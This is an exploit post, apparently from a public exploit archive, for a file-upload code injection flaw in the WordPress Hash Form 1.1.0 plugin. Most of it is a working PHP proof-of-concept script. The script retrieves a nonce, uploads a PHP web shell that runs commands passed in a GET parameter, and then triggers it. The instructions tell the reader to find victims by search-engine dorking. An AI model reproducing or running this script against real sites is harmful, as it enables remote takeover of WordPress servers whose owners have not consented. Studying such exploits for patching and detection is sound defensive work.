WordPress Hash Form 1.1.0 Code Injection

`=============================================================================================================================================  
| # Title : WordPress Hash Form 1.1.0 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://plugintests.com/plugins/wporg/hash-form/latest |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following php code Upload shell file from external link.  
  
[+] Line 117 set your target.  
  
[+] Line 111 set your commands.  
  
[+] save code as poc.php .  
  
[+] USage : cmd = php poc.php .  
  
[+] PayLoad :  
  
<?php  
  
class WordPressHashFormRCE {  
private $target_url;  
private $nonce;  
  
public function __construct($target_url) {  
$this->target_url = $target_url;  
}  
  
public function check() {  
if (!$this->isWordPressOnline()) {  
return 'WordPress does not appear to be online.';  
}  
  
$plugin_version = $this->checkPluginVersion('hash-form', '1.1.1');  
  
if ($plugin_version === null) {  
return 'Hash Form plugin does not appear to be installed.';  
}  
  
if ($plugin_version === false) {  
return 'Hash Form plugin is installed but the version is unknown.';  
}  
  
if ($plugin_version !== '1.1.0') {  
return "Hash Form plugin is version: $plugin_version, which is not vulnerable.";  
}  
  
return "Detected Hash Form plugin version: $plugin_version";  
}  
  
public function exploit() {  
echo "Attempting to retrieve nonce from the target...\n";  
$this->nonce = $this->getNonce();  
  
if (!$this->nonce) {  
die('Failed to retrieve the nonce necessary for file upload.');  
}  
  
echo "Nonce retrieved: {$this->nonce}\n";  
echo "Uploading PHP payload using the retrieved nonce...\n";  
  
$file_url = $this->uploadPhpFile();  
if (!$file_url) {  
die('Failed to upload the PHP payload. Check file permissions and server settings.');  
}  
  
echo "PHP payload uploaded successfully to $file_url\n";  
$this->triggerPayload($file_url);  
}  
  
private function isWordPressOnline() {  
$response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');  
return $response !== false;  
}  
  
private function checkPluginVersion($plugin_name, $version) {  
$response = $this->sendRequest('GET', "/wp-admin/admin-ajax.php?action=hashform_preview&form=1");  
if ($response === false) return null;  
  
preg_match('/"version":"([^"]+)"/', $response, $matches);  
return $matches[1] ?? false; // return the version or false if not found  
}  
  
private function getNonce() {  
$response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');  
if ($response === false) return null;  
  
preg_match('/"ajax_nounce":"([a-f0-9]+)"/', $response, $matches);  
return $matches[1] ?? null;  
}  
  
private function uploadPhpFile() {  
$file_content = $this->createPayload();  
$file_name = strtolower(bin2hex(random_bytes(4))) . '.php';  
  
$response = $this->sendRequest('POST', '/wp-admin/admin-ajax.php', [  
'action' => 'hashform_file_upload_action',  
'file_uploader_nonce' => $this->nonce,  
'allowedExtensions[0]' => 'php',  
'sizeLimit' => 1048576,  
'qqfile' => $file_name,  
'data' => $file_content  
]);  
  
$json_response = json_decode($response, true);  
return $json_response['url'] ?? null;  
}  
  
private function triggerPayload($url) {  
echo "Triggering the payload...\n";  
$this->sendRequest('GET', $url);  
}  
  
private function sendRequest($method, $uri, $data = []) {  
$url = $this->target_url . $uri;  
$options = [  
'http' => [  
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",  
'method' => $method,  
'content' => http_build_query($data),  
],  
];  
$context = stream_context_create($options);  
return @file_get_contents($url, false, $context);  
}  
  
private function createPayload() {  
// You can define your payload logic here, for now, we return a simple payload  
$payload = "<?php\n if(isset(\$_GET['cmd'])) { system(\$_GET['cmd']); }\n ?>";  
return base64_encode($payload);  
}  
}  
  
// استخدام الوحدة  
$target_url = 'http://target-wordpress-site.com';  
$exploit = new WordPressHashFormRCE($target_url);  
  
// تحقق من الثغرة  
echo $exploit->check() . "\n";  
  
// تنفيذ الاستغلال  
$exploit->exploit();  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================  
`